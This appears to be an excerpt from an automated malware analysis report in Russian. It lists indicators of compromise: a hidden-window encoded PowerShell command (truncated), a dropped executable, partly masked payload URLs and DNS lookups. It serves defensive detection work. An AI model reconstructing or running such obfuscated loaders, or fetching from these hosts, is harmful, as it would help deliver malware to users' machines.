Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAWABxAGsAcwBhAGgAeQBnAHEAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ARwBmAHIAZwBuAHcAdgByAGwAaAB2AGsAaAAgACMAPgAgACQAQwB4AGcAbgBtAGwAdABnAHQAbwB1AD0AJwBR...
- %HOMEPATH%\927.exe
- %HOMEPATH%\927.exe
- http://sh##.##lanja-rak.com/v8whd/n9o22o13/
- http://st#####.#herobertstreethub.com/staging.therobertstreethub.com/rvd97157/
- http://st#####.#herobertstreethub.com/cgi-sys/suspendedpage.cgi
- http://mu########argasinternacionales.com/calendar/wuif90380/
- DNS ASK bo###boten.com
- DNS ASK sh##.##lanja-rak.com
- DNS ASK wp.####conference.com
- DNS ASK st#####.#herobertstreethub.com
- DNS ASK mu########argasinternacionales.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAWABxAGsAcwBhAGgAeQBnAHEAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ARwBmAHIAZwBuAHcAdgByAGwAaAB2AGsAaAAgACMAPgAgACQAQwB4AGcAbgBtAGwAdABnAHQAbwB1AD0AJwBR...' (со скрытым окном)